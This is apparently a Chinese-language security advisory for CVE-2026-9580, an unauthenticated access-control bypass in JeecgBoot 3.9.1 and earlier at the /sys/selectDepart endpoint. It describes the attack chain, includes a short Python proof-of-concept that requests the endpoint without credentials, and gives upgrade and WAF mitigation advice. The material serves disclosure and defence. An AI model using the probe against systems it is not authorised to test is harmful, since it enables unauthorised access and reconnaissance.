IPBUF安全漏洞报告
English
CVE-2026-9580 CVSS 7.3 高危

CVE-2026-9580 JeecgBoot权限绕过漏洞

披露日期: 2026-05-26

漏洞信息

漏洞编号
CVE-2026-9580
漏洞类型
访问控制失效
CVSS评分
7.3 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
JeecgBoot

相关标签

JeecgBoot权限绕过访问控制失效未授权访问

漏洞概述

JeecgBoot 3.9.1及以下版本中存在一处严重的访问控制不当漏洞。该漏洞位于LoginController.selectDepart函数对应的/sys/selectDepart接口。由于缺乏有效的权限验证机制,未经身份认证的远程攻击者无需用户交互即可利用此漏洞。攻击成功后,可能导致系统机密性、完整性和可用性受到一定程度的影响。官方已发布3.9.2版本修复该问题,建议受影响用户尽快升级。

技术细节

该漏洞的核心在于JeecgBoot框架对特定接口的权限校验逻辑缺失。在受影响版本中,LoginController类的selectDepart方法被映射到/sys/selectDepart路径,但该方法未正确调用安全框架(如Spring Security)的权限注解或拦截器进行身份状态检查。因此,攻击者可以直接向服务器发送构造好的HTTP GET或POST请求至该端点。由于CVSS向量显示PR:N(权限要求:无),攻击者无需拥有合法账户即可执行操作。虽然当前被评估为低影响,但在实际业务中,获取部门数据可能为进一步的横向移动提供信息支持。

攻击链分析

STEP 1
1. 信息收集
攻击者识别目标系统运行的是JeecgBoot,且版本在3.9.1及以下。
STEP 2
2. 发起攻击
攻击者向目标服务器发送未经认证的HTTP请求访问/sys/selectDepart接口。
STEP 3
3. 验证利用
服务器返回正常的部门选择数据,表明绕过了身份认证检查,漏洞利用成功。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests def check_vulnerability(target_url): """ PoC for CVE-2026-9580 Checks if /sys/selectDepart is accessible without auth. """ endpoint = f"{target_url.rstrip('/')}/sys/selectDepart" try: response = requests.get(endpoint, timeout=5) if response.status_code == 200: print("[!] Potential vulnerability detected: Access granted without authentication.") print(f"[*] Response: {response.text[:100]}") else: print(f"[-] Status code: {response.status_code}") except Exception as e: print(f"[Error] {e}") if __name__ == "__main__": target = "http://127.0.0.1:8080" # Replace with actual target check_vulnerability(target)

影响范围

JeecgBoot <= 3.9.1

防御指南

临时缓解措施
如果无法立即升级,建议在Web应用防火墙(WAF)或反向代理层配置访问策略,禁止外部网络直接访问/sys/selectDepart路径,或者添加临时的身份校验过滤器。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表